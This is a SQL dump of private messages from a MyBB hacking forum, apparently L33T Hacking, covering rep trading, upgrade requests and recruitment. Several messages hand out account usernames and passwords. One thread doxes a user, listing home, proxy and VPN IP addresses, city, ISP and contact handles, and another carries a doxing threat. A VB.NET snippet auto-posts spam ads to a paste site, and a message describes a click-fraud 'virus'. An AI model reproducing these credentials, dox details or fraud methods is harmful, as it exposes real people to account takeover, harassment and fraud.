'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Hey', '0', 'Yo join our skype chat...add me. : flamingworm', '1350437943', '0', '1', '0', '1', '0', '2', '1350438036'); INSERT INTO mybb_privatemessages VALUES('3299', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Hey', '0', 'Yo join our skype chat...add me. : flamingworm', '1350437943', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3301', '222', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Hey', '0', 'Yo add me on skype and Ill add you to our skype chat...: flamingworm', '1350449383', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3386', '100', '100', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'that minecraft account ', '0', 'hey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)', '1350589563', '0', '1', '0', '1', '0', '2', '1350601737'); INSERT INTO mybb_privatemessages VALUES('3304', '199', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'sup', '0', 'I\'ve just been a little busy lately.', '1350462065', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3305', '222', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'hey ', '0', 'sorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain', '1350466620', '0', '3', '1350495668', '1', '0', '2', '1350493856'); INSERT INTO mybb_privatemessages VALUES('3306', '257', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'hey ', '0', 'sorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain', '1350466620', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3309', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hey// upgrade', '0', 'Hey \r\n\r\nHi. I have a question. Im Elite atm, Can I upgrade even higher? \r\nIn hackforums the also have l33t and then uber. I think there are a lot of elites right now so I d like to upgrade. If theres nothing like that Id just like to donate. \r\n\r\nGreetings', '1350489928', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3310', '257', '257', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Signature', '0', '[align=justify]Hi,\r\n\r\nPlease let me know if you like it\r\n\r\nSignature:\r\nhttp://i.imgur.com/wqgiy.jpg[/align]', '1350490811', '0', '1', '0', '1', '0', '2', '1350502947'); INSERT INTO mybb_privatemessages VALUES('3311', '228', '257', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Signature', '0', '[align=justify]Hi,\r\n\r\nPlease let me know if you like it\r\n\r\nSignature:\r\nhttp://i.imgur.com/wqgiy.jpg[/align]', '1350490811', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3312', '264', '264', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"264\";}}', '1', 'Signature', '0', 'http://i.imgur.com/GgMTS.jpg\r\n\r\nWhat do you think?\r\n\r\n\r\n\r\n\r\n', '1350493640', '0', '3', '1350496007', '1', '0', '2', '1350495949'); INSERT INTO mybb_privatemessages VALUES('3313', '228', '264', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"264\";}}', '2', 'Signature', '0', 'http://i.imgur.com/GgMTS.jpg\r\n\r\nWhat do you think?\r\n\r\n\r\n\r\n\r\n', '1350493640', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3314', '257', '257', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nsorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain\r\n[/quote]\r\n\r\nYou didn\'t have any rep so I repped you...lolz', '1350495668', '0', '3', '1350503022', '1', '0', '2', '1350502976'); INSERT INTO mybb_privatemessages VALUES('3315', '222', '257', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nsorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain\r\n[/quote]\r\n\r\nYou didn\'t have any rep so I repped you...lolz', '1350495668', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3316', '228', '228', '264', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Signature', '0', '[quote=\'VirtualLegend\']\r\nhttp://i.imgur.com/GgMTS.jpg\r\n\r\nWhat do you think?\r\n\r\n\r\n\r\n\r\n\r\n[/quote]', '1350495964', '0', '1', '0', '0', '0', '0', '1350497193'); INSERT INTO mybb_privatemessages VALUES('3317', '264', '228', '264', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Signature', '0', '[quote=\'VirtualLegend\']\r\nhttp://i.imgur.com/GgMTS.jpg\r\n\r\nWhat do you think?\r\n\r\n\r\n\r\n\r\n\r\n[/quote]', '1350495964', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3318', '228', '228', '264', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Signature', '0', '[quote=\'VirtualLegend\']\r\nhttp://i.imgur.com/GgMTS.jpg\r\n\r\nWhat do you think?\r\n\r\n\r\n\r\n\r\n\r\n[/quote]\r\nLooks great!', '1350496007', '0', '1', '0', '0', '0', '0', '1350497200'); INSERT INTO mybb_privatemessages VALUES('3319', '264', '228', '264', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Signature', '0', '[quote=\'VirtualLegend\']\r\nhttp://i.imgur.com/GgMTS.jpg\r\n\r\nWhat do you think?\r\n\r\n\r\n\r\n\r\n\r\n[/quote]\r\nLooks great!', '1350496007', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3321', '222', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: hey ', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nsorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain\r\n[/quote]\r\n\r\nYou didn\'t have any rep so I repped you...lolz\r\n[/quote]\r\noh thanks alot, i think i already reped you :)', '1350503022', '0', '1', '0', '1', '0', '2', '1350503042'); INSERT INTO mybb_privatemessages VALUES('3322', '257', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: hey ', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nsorry but when you +reped me i didnt get this part Op NVM lmao thanks please explain\r\n[/quote]\r\n\r\nYou didn\'t have any rep so I repped you...lolz\r\n[/quote]\r\noh thanks alot, i think i already reped you :)', '1350503022', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3323', '264', '264', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"264\";}}', '1', 'hey ', '0', 'hey are into gaming if so come check out gamers section thanks mate', '1350520568', '0', '1', '0', '1', '0', '2', '1350522461'); INSERT INTO mybb_privatemessages VALUES('3324', '257', '264', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"264\";}}', '2', 'hey ', '0', 'hey are into gaming if so come check out gamers section thanks mate', '1350520568', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3522', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'here you go', '0', 'Hey remember when you wanted a account for Minecraft and it didn\'t work,well i feel bad because you didn\'t get one here you go \r\nUsername: eliotbehr@gmail.com\r\nPassword:pencil\r\nThis one WORKS and don\'t tell me it doesn\'t enjoy my friend ', '1350782980', '0', '1', '0', '1', '0', '2', '1350788164'); INSERT INTO mybb_privatemessages VALUES('3521', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Yo', '0', 'Hey Joker, I was wondering if you could send me the G3 Forums theme please.', '1350775294', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3329', '67', '67', '3', 'a:1:{s:2:\"to\";a:2:{i:0;s:2:\"67\";i:1;s:1:\"2\";}}', '1', 'Custom Pastebin Source Code', '0', 'Here you go, Enjoy\r\nhttp://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350523936', '0', '1', '0', '1', '0', '2', '1350545330'); INSERT INTO mybb_privatemessages VALUES('3330', '2', '2', '3', 'a:1:{s:2:\"to\";a:2:{i:0;s:2:\"67\";i:1;s:1:\"2\";}}', '1', 'Custom Pastebin Source Code', '0', 'Here you go, Enjoy\r\nhttp://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350523936', '0', '1', '0', '1', '0', '2', '1350564068'); INSERT INTO mybb_privatemessages VALUES('3331', '3', '2', '3', 'a:1:{s:2:\"to\";a:2:{i:0;s:2:\"67\";i:1;s:1:\"2\";}}', '2', 'Custom Pastebin Source Code', '0', 'Here you go, Enjoy\r\nhttp://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350523936', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3333', '53', '53', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: hey// upgrade', '0', '[quote=\'sirchamp\']\r\nHey \r\n\r\nHi. I have a question. Im Elite atm, Can I upgrade even higher? \r\nIn hackforums the also have l33t and then uber. I think there are a lot of elites right now so I d like to upgrade. If theres nothing like that Id just like to donate. \r\n\r\nGreetings\r\n[/quote]\r\n\r\nNope there are no higher upgrade groups at the moment. You can use the \"upgrade\" page to make donations for now. The minimum you can donate is $1, just edit the price to the price you would like to donate.\r\n\r\nThanks for the donation. I will also give you the donation award when the mywards plugin is back. ', '1350525318', '0', '1', '0', '1', '0', '0', '1350545315'); INSERT INTO mybb_privatemessages VALUES('3334', '199', '199', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '1', 'Re: sup', '0', '[quote=\'Anonymous™\']\r\nI\'ve just been a little busy lately.\r\n[/quote]\r\n\r\nOh OK. ', '1350525338', '0', '1', '0', '1', '0', '0', '1350578792'); INSERT INTO mybb_privatemessages VALUES('3385', '222', '2', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Re: Source', '0', '[quote=\'Apathy\']\r\nCould you send me the source? Thanks man.\r\n[/quote]\r\n\r\nHere you go bro. Code is nice and simple. Decided to not to include a webclient. You can change this any way you like to make ur own bot :P\r\n\r\n[code]Public Class Form1\r\n\r\n Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click\r\n ToolStripStatusLabel2.Text = \"Browsing to Pasteheaven\"\r\n \'browse to pasteheaven\r\n WebBrowser1.Navigate(\"http://pasteheaven.com\")\r\n Do Until WebBrowser1.ReadyState = WebBrowserReadyState.Complete\r\n Application.DoEvents()\r\n Loop\r\n ToolStripStatusLabel2.Text = \"Done Browsing\"\r\n \'declare tags\r\n Dim l33thacking As HtmlElementCollection = WebBrowser1.Document.GetElementsByTagName(\"textarea\")\r\n\r\n For Each hacker As HtmlElement In l33thacking\r\n If hacker.GetAttribute(\"id\") = \"paste\" Then\r\n hacker.InnerText = \"Be sure to join http://l33thacking.net today for all the best hacking tutorials and content\"\r\n \'hacker.InnerText = \"Hey What\'s up\" \'Test Post\r\n End If\r\n Next\r\n Dim forsakenbeing As HtmlElementCollection = WebBrowser1.Document.GetElementsByTagName(\"input\")\r\n\r\n For Each awesomeness As HtmlElement In forsakenbeing \'For each element with id of title post the title below\r\n If awesomeness.GetAttribute(\"id\") = \"title\" Then\r\n awesomeness.InnerText = \"Join L33thacking.net\"\r\n End If\r\n \' click submit\r\n If awesomeness.GetAttribute(\"id\") = \"submit\" Then\r\n awesomeness.InvokeMember(\"click\")\r\n End If\r\n ToolStripStatusLabel2.Text = \"Creating paste\"\r\n Next\r\n ToolStripStatusLabel2.Text = \"Done. Check http://pasteheaven.com for your paste\"\r\n End Sub\r\nEnd Class[/code]', '1350565438', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3338', '272', '1', '272', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Your Dox - Love AF', '0', 'This is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]', '1350526354', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3339', '272', '272', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '1', 'Re: Your Dox - Love AF', '0', '[quote=\'YuckFou\']\r\nThis is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]\r\n[/quote]\r\n\r\nOh my god did you just get my VPN IP or did I just ignore the PM BITCH!', '1350526482', '0', '3', '1350526596', '1', '0', '0', '1350526522'); INSERT INTO mybb_privatemessages VALUES('3341', '272', '1', '272', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Your Dox - Love AF', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'YuckFou\']\r\nThis is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]\r\n[/quote]\r\n\r\nOh my god did you just get my VPN IP or did I just ignore the PM BITCH!\r\n[/quote]\r\n\r\nWe\'ll be spreading it momentarily, bitch.', '1350526596', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3342', '272', '272', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '1', 'Re: Your Dox - Love AF', '0', '[quote=\'YuckFou\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'YuckFou\']\r\nThis is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]\r\n[/quote]\r\n\r\nOh my god did you just get my VPN IP or did I just ignore the PM BITCH!\r\n[/quote]\r\n\r\nWe\'ll be spreading it momentarily, bitch.\r\n[/quote]\r\n\r\nOh OK. Just let me know when you are done so I can start laughing. ', '1350526635', '0', '1', '0', '1', '0', '0', '1350526664'); INSERT INTO mybb_privatemessages VALUES('3517', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Admin', '0', 'I need you to make you an access account.\r\n\r\nSend me a username that you don\'t use a lot and a password that you are not using on LH.', '1350760902', '0', '1', '0', '1', '0', '0', '1350762074'); INSERT INTO mybb_privatemessages VALUES('3519', '270', '1', '270', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi there.', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'LCS\']\r\n[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nHow are you today? If you haven\'t received this PM yet, then how do you find L33T Hacking so far? Feel free to share your experience, ideas, feedback anything you like.\r\n[/quote]\r\nI\'m good. I think LH is awesome we just need a few more members. Can I suggest a dedicated tab to monetizing? I personally would want to make it as active as it can be; a few people know about what I love, and that is online monetizing.\r\n\r\nThanks! \r\n[/quote]\r\n\r\nTrue and the thing is that the monetizing section is not that active at the moment but we would add one when we get more active members.\r\n[/quote]\r\nI think that actually having a monetizing section could attract more members. I\'d post alot of tutorials/methods; and obviously I believe that it would help with the ranking on Google etc.', '1350774519', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3346', '272', '272', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '1', 'congrats', '0', '108.171.103.148\r\n\r\nDid you even bother to hide your ip?\r\n\r\nOh and heres something for you to post on AF\r\nLets begin shall we.\r\n\r\nState: Rio de Janeiro\r\nCity: Duque De Caxias\r\nISP: Vivo S.A.\r\nOrganization: Vivo S.A.\r\n\r\n\r\nUsername: The Anarchist\r\n\r\nEmail: Unverified@hotmail.com\r\n\r\nSocial Networking\r\n\r\nSkype: TheAnarchistAF\r\nMSN: unverified@hotmail.com\r\n\r\nWEBSITE\r\n\r\nLink: http://anarchyforums.net/\r\n\r\nHosting: koddos.com\r\n\r\nNameservers: ns3.koddos.com and ns4.koddos.com\r\n177.118.114.112 <= Home IP\r\n 200.166.184.19 <= Proxy IP\r\n108.171.103.234 <= VPN IP\r\n\r\n', '1350527059', '0', '3', '1350527100', '1', '0', '2', '1350527068'); INSERT INTO mybb_privatemessages VALUES('3347', '61', '272', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '2', 'congrats', '0', '108.171.103.148\r\n\r\nDid you even bother to hide your ip?\r\n\r\nOh and heres something for you to post on AF\r\nLets begin shall we.\r\n\r\nState: Rio de Janeiro\r\nCity: Duque De Caxias\r\nISP: Vivo S.A.\r\nOrganization: Vivo S.A.\r\n\r\n\r\nUsername: The Anarchist\r\n\r\nEmail: Unverified@hotmail.com\r\n\r\nSocial Networking\r\n\r\nSkype: TheAnarchistAF\r\nMSN: unverified@hotmail.com\r\n\r\nWEBSITE\r\n\r\nLink: http://anarchyforums.net/\r\n\r\nHosting: koddos.com\r\n\r\nNameservers: ns3.koddos.com and ns4.koddos.com\r\n177.118.114.112 <= Home IP\r\n 200.166.184.19 <= Proxy IP\r\n108.171.103.234 <= VPN IP\r\n\r\n', '1350527059', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3348', '61', '61', '272', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Re: congrats', '0', '[quote=\'NXK\']\r\n108.171.103.148\r\n\r\nDid you even bother to hide your ip?\r\n\r\nOh and heres something for you to post on AF\r\nLets begin shall we.\r\n\r\nState: Rio de Janeiro\r\nCity: Duque De Caxias\r\nISP: Vivo S.A.\r\nOrganization: Vivo S.A.\r\n\r\n\r\nUsername: The Anarchist\r\n\r\nEmail: Unverified@hotmail.com\r\n\r\nSocial Networking\r\n\r\nSkype: TheAnarchistAF\r\nMSN: unverified@hotmail.com\r\n\r\nWEBSITE\r\n\r\nLink: http://anarchyforums.net/\r\n\r\nHosting: koddos.com\r\n\r\nNameservers: ns3.koddos.com and ns4.koddos.com\r\n177.118.114.112 <= Home IP\r\n 200.166.184.19 <= Proxy IP\r\n108.171.103.234 <= VPN IP\r\n\r\n\r\n[/quote]\r\n\r\nThat\'s Anar, he\'s probably using a proxy chain.', '1350527100', '0', '3', '1350527219', '0', '0', '0', '1350527190'); INSERT INTO mybb_privatemessages VALUES('3349', '272', '61', '272', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: congrats', '0', '[quote=\'NXK\']\r\n108.171.103.148\r\n\r\nDid you even bother to hide your ip?\r\n\r\nOh and heres something for you to post on AF\r\nLets begin shall we.\r\n\r\nState: Rio de Janeiro\r\nCity: Duque De Caxias\r\nISP: Vivo S.A.\r\nOrganization: Vivo S.A.\r\n\r\n\r\nUsername: The Anarchist\r\n\r\nEmail: Unverified@hotmail.com\r\n\r\nSocial Networking\r\n\r\nSkype: TheAnarchistAF\r\nMSN: unverified@hotmail.com\r\n\r\nWEBSITE\r\n\r\nLink: http://anarchyforums.net/\r\n\r\nHosting: koddos.com\r\n\r\nNameservers: ns3.koddos.com and ns4.koddos.com\r\n177.118.114.112 <= Home IP\r\n 200.166.184.19 <= Proxy IP\r\n108.171.103.234 <= VPN IP\r\n\r\n\r\n[/quote]\r\n\r\nThat\'s Anar, he\'s probably using a proxy chain.', '1350527100', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3350', '272', '272', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '1', 'Re: congrats', '0', '[quote=\'YuckFou\']\r\n[quote=\'NXK\']\r\n108.171.103.148\r\n\r\nDid you even bother to hide your ip?\r\n\r\nOh and heres something for you to post on AF\r\nLets begin shall we.\r\n\r\nState: Rio de Janeiro\r\nCity: Duque De Caxias\r\nISP: Vivo S.A.\r\nOrganization: Vivo S.A.\r\n\r\n\r\nUsername: The Anarchist\r\n\r\nEmail: Unverified@hotmail.com\r\n\r\nSocial Networking\r\n\r\nSkype: TheAnarchistAF\r\nMSN: unverified@hotmail.com\r\n\r\nWEBSITE\r\n\r\nLink: http://anarchyforums.net/\r\n\r\nHosting: koddos.com\r\n\r\nNameservers: ns3.koddos.com and ns4.koddos.com\r\n177.118.114.112 <= Home IP\r\n 200.166.184.19 <= Proxy IP\r\n108.171.103.234 <= VPN IP\r\n\r\n\r\n[/quote]\r\n\r\nThat\'s Anar, he\'s probably using a proxy chain.\r\n[/quote]\r\n\r\nI\'ve already gotten through it. Post it on AF. Please. ', '1350527219', '0', '1', '0', '1', '0', '2', '1350527245'); INSERT INTO mybb_privatemessages VALUES('3351', '61', '272', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"272\";}}', '2', 'Re: congrats', '0', '[quote=\'YuckFou\']\r\n[quote=\'NXK\']\r\n108.171.103.148\r\n\r\nDid you even bother to hide your ip?\r\n\r\nOh and heres something for you to post on AF\r\nLets begin shall we.\r\n\r\nState: Rio de Janeiro\r\nCity: Duque De Caxias\r\nISP: Vivo S.A.\r\nOrganization: Vivo S.A.\r\n\r\n\r\nUsername: The Anarchist\r\n\r\nEmail: Unverified@hotmail.com\r\n\r\nSocial Networking\r\n\r\nSkype: TheAnarchistAF\r\nMSN: unverified@hotmail.com\r\n\r\nWEBSITE\r\n\r\nLink: http://anarchyforums.net/\r\n\r\nHosting: koddos.com\r\n\r\nNameservers: ns3.koddos.com and ns4.koddos.com\r\n177.118.114.112 <= Home IP\r\n 200.166.184.19 <= Proxy IP\r\n108.171.103.234 <= VPN IP\r\n\r\n\r\n[/quote]\r\n\r\nThat\'s Anar, he\'s probably using a proxy chain.\r\n[/quote]\r\n\r\nI\'ve already gotten through it. Post it on AF. Please. ', '1350527219', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3354', '3', '3', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Request', '0', 'I know you know a lot about bh but can\'t you contribute in BH orums?', '1350530956', '0', '3', '1350532230', '1', '0', '0', '1350532142'); INSERT INTO mybb_privatemessages VALUES('3769', '222', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Pro Doxer- NSA', '0', '[quote=\'Timmy\']\r\n[quote=\'Exposé\']\r\n[quote=\'Timmy\']\r\nhttp://pastebin.com/eXVxALWX\r\n[/quote]\r\n\r\nLmao...who is this...and yeh if you got this ur good :D\r\n[/quote]\r\n\r\nxhostfire.com hosting owner.\r\n\r\nI didn\'t DOX him, Jok3r did because jok3r was banned from one of their servers for running a site with phishing discussions.\r\n[/quote]\r\n\r\nWell a hosting company isnt that hard to dox since they use real information....lmao. But do you dox at all?', '1351044545', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3357', '3', '5', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Request', '0', '[quote=\'Timmy\']\r\nI know you know a lot about bh but can\'t you contribute in BH orums?\r\n[/quote]\r\nWhat are you trying to say?', '1350532230', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3426', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Skype', '0', '[quote=\'t3h jok3r\']\r\nCan you come on Skype?\r\n[/quote]\r\nTomorrow I need to finish hw then studying. What is up?', '1350617431', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3428', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Awards', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'t3h jok3r\']\r\nLook I\'m going to tell you for the last time, the next time you talk about the awards system then I will give you a warning. \r\n[/quote]\r\n\r\nsorry im just so excited :)\r\n[/quote]\r\n\r\nI can understand but it\'s annoying. \r\n[/quote]\r\n\r\nsorry admin', '1350617483', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3430', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)\r\n[/quote]\r\n\r\n\r\nSure that would be great but before we upgrade someone we now require two HQ threads. \r\n[/quote]\r\n\r\nAlready Done!! , i posted 4 HQ tuts 2 extra :) :\r\n\r\nhttp://l33thacking.net/thread-987.html\r\n\r\nhttp://l33thacking.net/thread-988.html\r\n\r\nhttp://l33thacking.net/thread-989.html\r\n\r\nhttp://l33thacking.net/thread-990.html', '1350639163', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3431', '228', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Unique group', '0', 'just curious if you would be interested in joining Unique, it\'s an invite only group, we could use you there :)', '1350650464', '0', '3', '1350683860', '1', '0', '2', '1350683816'); INSERT INTO mybb_privatemessages VALUES('3432', '62', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Unique group', '0', 'just curious if you would be interested in joining Unique, it\'s an invite only group, we could use you there :)', '1350650464', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3946', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hey', '0', 'Hey man whats happening ', '1351735873', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3947', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Need image for Advert', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\nI need your help in GFX, I have seen couple of your threads on GFX so thought you could help me out. Doesn\'t matter if it\'s professional or not but must look decent. \r\n\r\nI need something like a slogan or something, I will using it to put put ADs on other sites. I need it to say l33thacking and join us OR what L33T Hacking is about. Anything attractive.\r\n\r\nThe size should be 700x90 or anything smaller.\r\n\r\nThanks a bunch.\r\n[/quote]\r\nAny ideas on the slogan?\r\n[/quote]\r\n\r\nBasically I want it to say L33T Hacking and \"Join Us\" somewhere on it.', '1351735923', '0', '1', '0', '1', '0', '0', '1351769139'); INSERT INTO mybb_privatemessages VALUES('3937', '82', '53', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: Adfoc.us Views', '0', '[quote=\'sirchamp\']\r\n[quote=\'iTzIpod\']\r\nAre you willing to give me any more?\r\n\r\nAlso, if you can, I would appreciate you giving out the source. Like the bot/program or the website. \r\n\r\nWhatever you use to get the Adfoc.us views! :o\r\nI really need this..\r\nI\'ll like share half my profits with you.\r\n[/quote]\r\nI have 2 ways. I use the second way for my customers. I have a programm (7 USD at HF) which lets you make a \"virus\"(undetected) the virus opens all the adf.ly or adfoc.us links in the background and clicks on forward/skip. Then it changes the ip of the person and then restarts. Simple but effective.\r\n\r\n\r\n[/quote]\r\n\r\nOo.\r\nWill you give it to me? :p \r\n\r\nUmm\r\nCan you get me more views?\r\nSame information \r\n\r\niTzIpod@hotmail.com:Moneymaking\r\n:D \r\nThanks. Paying you more money.', '1351726933', '0', '1', '0', '1', '0', '0', '0'); 